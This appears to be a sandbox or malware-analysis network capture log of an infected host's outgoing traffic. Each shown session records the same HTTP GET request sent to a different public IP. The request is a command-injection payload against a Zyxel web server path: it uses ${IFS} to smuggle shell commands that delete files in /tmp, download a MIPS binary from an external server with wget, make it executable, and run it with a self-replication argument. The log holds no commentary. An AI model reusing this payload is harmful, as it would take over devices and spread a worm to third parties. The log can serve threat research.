                                    Jan 13, 2024 19:02:24.957740068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2200192.168.2.1338840167.191.114.65443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.957775116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2201192.168.2.1354872117.112.40.165443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.957815886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2202192.168.2.1354094140.243.7.120443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.957850933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2203192.168.2.1335628190.68.16.116443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.957879066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2204192.168.2.1337220217.83.211.249443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.957926989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2205192.168.2.1338218112.136.186.237443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.957957029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2206192.168.2.1344790212.93.63.74443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.957987070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2207192.168.2.1349094100.61.5.160443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.958034992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2208192.168.2.1359292111.79.165.181443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.958084106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2209192.168.2.134669460.105.73.139443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.958106995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2210192.168.2.134088218.174.125.68443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.958143950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2211192.168.2.1358328119.250.132.136443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.958198071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2212192.168.2.1355890112.53.47.189443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.958247900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2213192.168.2.1350900183.134.126.127443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.958247900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2214192.168.2.134934879.127.223.247443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.958296061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2215192.168.2.1334344200.197.49.152443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.958324909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2216192.168.2.1343500219.166.9.93443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.958384991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2217192.168.2.133714660.5.254.213443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.958405018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2218192.168.2.1344772184.45.209.144443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.958456039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2219192.168.2.1358234103.32.147.202443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.958481073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2220192.168.2.134339049.13.91.160443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.958544970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2221192.168.2.1339600124.29.100.20443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.958565950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2222192.168.2.1348424125.148.193.39443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.958621025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2223192.168.2.134621472.132.73.104443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.958661079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2224192.168.2.134095664.184.204.69443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.958686113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2225192.168.2.1358332164.83.80.170443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.958759069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2226192.168.2.1334764157.23.228.201443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.958815098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2227192.168.2.134690652.98.0.144443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.958832979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2228192.168.2.1355616196.166.37.197443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.958865881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2229192.168.2.1349986110.123.73.164443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.958909035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2230192.168.2.135730259.238.139.192443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.958940029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2231192.168.2.1338514205.87.130.33443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.958996058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2232192.168.2.133539279.109.171.21443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.959043026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2233192.168.2.1356310141.149.161.164443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.959085941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2234192.168.2.1345870198.47.153.14443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.959111929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2235192.168.2.1339556116.174.238.167443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.959158897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2236192.168.2.1341208168.111.228.242443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.959188938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2237192.168.2.134508458.204.55.119443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.959245920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2238192.168.2.135311638.72.232.86443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.959285021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2239192.168.2.1354122126.91.12.167443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.959306955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2240192.168.2.1352498179.219.19.156443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.959341049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2241192.168.2.1346680114.201.39.60443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.959389925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2242192.168.2.133400438.251.38.194443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.959419966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2243192.168.2.1355232217.227.80.106443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.959427118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2244192.168.2.1359800202.255.67.2443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.959495068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2245192.168.2.1334090134.141.135.175443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.959511995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2246192.168.2.135806040.127.204.119443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.959561110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2247192.168.2.1341480121.223.87.64443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.959585905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2248192.168.2.1349952220.185.72.107443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.959616899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2249192.168.2.13406764.97.189.91443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.959645987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2250192.168.2.135696664.20.128.221443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.959677935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2251192.168.2.1352836101.217.31.28443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.959705114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2252192.168.2.134619236.81.23.56443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.959763050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2253192.168.2.1346626188.175.95.244443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.959790945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2254192.168.2.1334728130.254.122.148443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.959831953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2255192.168.2.1351658166.249.6.197443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.959873915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2256192.168.2.135687814.222.106.116443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.959923983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2257192.168.2.135563074.242.165.40443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.959965944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2258192.168.2.1341510125.73.228.153443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.959990978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2259192.168.2.1338956212.69.208.218443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.960036993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2260192.168.2.1345152183.42.247.29443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.960092068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2261192.168.2.135516034.74.95.159443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.960114002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2262192.168.2.134240243.230.248.65443
                                    TimestampBytes transferredDirectionData
